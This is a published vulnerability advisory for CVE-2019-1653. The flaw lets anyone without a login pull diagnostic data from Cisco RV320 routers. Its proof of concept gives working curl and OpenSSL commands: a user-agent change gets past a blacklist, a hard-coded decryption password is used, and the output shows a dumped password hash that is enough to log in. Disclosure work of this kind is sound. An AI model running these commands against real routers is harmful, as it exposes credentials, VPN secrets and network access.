Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability

Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-004
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-003) [2] in the CGI
program:

/cgi-bin/export_debug_msg.exp

By issuing an HTTP POST request to this program, it was possible to
retrieve various diagnostic information from the device, including its
current configuration. This request did not require any prior
authentication. Cisco adressed this vulnerability in firmware version
1.4.2.19 [3].

RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. The user agent "curl" is blacklisted by
the firmware and must be adjusted in the HTTP client. Again,
exploitation does not require any authentication.


Proof of Concept
================

The diagnostic data can be retrieved by issuing an HTTP POST request to
the vulnerable CGI program. OpenSSL is used to decrypt the data with the
hard-coded password "NKDebug12#$%" before unpacking it with tar (output
shortened):

------------------------------------------------------------------------
$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \
  'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug

$ openssl aes-128-cbc -salt -md md5 -d \
  -k 'NKDebug12#$%' < debug > debug.tgz

$ mkdir output && tar -xf debug.tgz -C output/

$ ls -1 output/
debug_messages.txt
etc.tgz
nk_sysconfig
var.tgz

$ cat output/nk_sysconfig
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]
------------------------------------------------------------------------


Workaround
==========

Prevent untrusted clients from connecting to the device's web server.


Fix
===

None


Security Risk
=============

This vulnerability is rated as a high risk as it exposes sensitive
diagnostic information, such as the device's configuration, to
untrusted, potentially malicious parties. By retrieving this
information, attackers can obtain internal network configuration, VPN or
IPsec secrets, as well as password hashes for the router's user
accounts. Knowledge of a user's password hash is sufficient to log into
the router's web interface, cracking of the hash is not required. Any
information obtained through exploitation of this vulnerability can be
used to facilitate further compromise of the device itself or attached
networks.

#  0day.today [2019-03-30]  #